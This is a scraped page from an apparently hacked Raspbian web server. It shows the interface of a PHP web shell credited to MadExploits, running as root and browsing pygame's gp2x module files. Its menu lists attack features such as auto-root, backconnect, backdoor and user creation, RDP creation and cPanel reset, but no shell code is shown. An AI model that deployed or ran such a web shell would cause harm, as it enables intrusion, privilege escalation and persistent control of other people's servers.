Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
pygame /
gp2x /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
559
B
-rw-r--r--
__init__.pyc
514
B
-rw-r--r--
constants.py
556
B
-rw-r--r--
constants.pyc
696
B
-rw-r--r--
locals.py
38
B
-rw-r--r--
locals.pyc
193
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
# this lets me know that the module has not been imported. # we store it so we don't reimport a module each time the isgp2x function is called. _is_gp2x = -1 def isgp2x(): """ Returns True if we are running on a gp2x, else False """ if _is_gp2x == -1: #TODO: FIXME: HACK: need to find a good way to do this. # Use configure to put 'gp2x' in the version string? import sys if "arm" in sys.version: _is_gp2x = True else: _is_gp2x = False else: return _is_gp2x
Close